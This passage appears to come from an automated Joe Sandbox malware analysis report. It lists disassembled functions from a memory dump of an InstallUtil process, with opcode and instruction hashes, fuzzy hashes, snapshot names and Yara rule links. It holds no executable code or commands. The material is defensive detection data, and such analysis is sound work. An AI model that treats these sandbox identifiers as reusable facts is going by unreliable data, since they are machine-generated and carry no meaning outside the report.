                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d068e0221486d1a438fc1fa0fdbaef5a2d2f1c2dca67b7cdc3f9b8f909f9766d
                                      • Instruction ID: f7be2085e984fefb05a71b2ffd630d586c1bb21b8752d7bed58acfa5c1216ae9
                                      • Opcode Fuzzy Hash: d068e0221486d1a438fc1fa0fdbaef5a2d2f1c2dca67b7cdc3f9b8f909f9766d
                                      • Instruction Fuzzy Hash: 3CE092216182C04FC742977894A94D53FB1AE0A12031540DAC485CB663D925C806CB82
                                      Function 026A0A58 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2679927715.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_26a0000_InstallUtil.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab9196bee89832e55f674bad0fe05202ed5e61767c0126f35a16d70b76dce1a6
                                      • Instruction ID: 1d805690c8b3b9c7741b2b9f972df15b878bae945c7842d99a27dd4db71a86df
                                      • Opcode Fuzzy Hash: ab9196bee89832e55f674bad0fe05202ed5e61767c0126f35a16d70b76dce1a6
                                      • Instruction Fuzzy Hash: 4CD0C935B506158FCB00AFB9E41C85937EDEF89A5631008B9F51AC7320EF39AD159BC5
                                      Function 026A0888 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2679927715.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_26a0000_InstallUtil.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 712a47b364be50712e575a557c1ecb966b205542afdbf4503e63391c810318bd
                                      • Instruction ID: ce52b1a3ceb710671fe600b401ef9d9c432c59c803639c0b08e940d1f7aeedcb
                                      • Opcode Fuzzy Hash: 712a47b364be50712e575a557c1ecb966b205542afdbf4503e63391c810318bd
                                      • Instruction Fuzzy Hash: F8D01270D0020CEFC740DFA8E91199DB7F9EF442007604499D508E3304EA312E109B44
                                      Function 026A3BE0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2679927715.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_26a0000_InstallUtil.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd12d6f57cdd6d6ce2ff26f84b9d3dac6ec69b50b68cde6013332d330c627e9e
                                      • Instruction ID: 7b2d1bcb22a294b486f42296f530476419f9c45c4c403b3b509c5c2e8ea6923d
                                      • Opcode Fuzzy Hash: bd12d6f57cdd6d6ce2ff26f84b9d3dac6ec69b50b68cde6013332d330c627e9e
                                      • Instruction Fuzzy Hash: 3BC00278E40A008FCB085F79985C2687AF1A748302F2048AAA817C2B41EA3448689F08
                                      Function 026A8A40 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2679927715.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_26a0000_InstallUtil.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87306d4993b62cc65cc2f248bf482d4ab3aea5033425e8fcc14759f7ca151189
                                      • Instruction ID: 71af3034d0d22d1f1c150b69fde1e0b4a60b0a533105edcf876ad38919aabd5a
                                      • Opcode Fuzzy Hash: 87306d4993b62cc65cc2f248bf482d4ab3aea5033425e8fcc14759f7ca151189
                                      • Instruction Fuzzy Hash: 43A02230002B0C828E003AB02000022338C0A02208B8000FC820C0AE300833E8E0CCA8